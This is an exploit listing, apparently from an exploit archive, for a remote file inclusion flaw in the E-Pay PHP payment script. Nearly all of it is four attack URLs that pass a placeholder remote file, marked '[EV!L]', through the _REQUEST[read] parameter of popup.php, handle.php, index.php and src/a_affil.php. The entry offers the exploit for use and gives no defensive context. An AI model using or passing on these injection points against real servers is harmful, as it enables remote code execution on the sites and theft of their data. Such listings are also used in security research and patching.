id: 10440
date: 12/26/2009
title: E-Pay RFI Vulnerability
author: indoushka
cves: 

=======================
E-Pay RFI Vulnerability
=======================

========================================================================================                 
| # Title    : E-Pay  RFI Vulnerability                                                |
| # Author   : indoushka                                                               |
| # Script   : e-pay * Copyright © 2003 IPayNow.com All rights reserved                |
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)       |
| # Bug      : RFI                                                                     |
======================      Exploit By indoushka       =================================
| # Exploit  :
|
| 1- http://server/epay/popup.php?_REQUEST[read]=[EV!L]
| 2- http://server/epay/handle.php?_REQUEST[read]=[EV!L]
| 3- http://server/epay/index.php?_REQUEST[read]=[EV!L]
| 4- http://server/epay/src/a_affil.php?_REQUEST[read]=[EV!L]



#  0day.today [2023-03-25]  #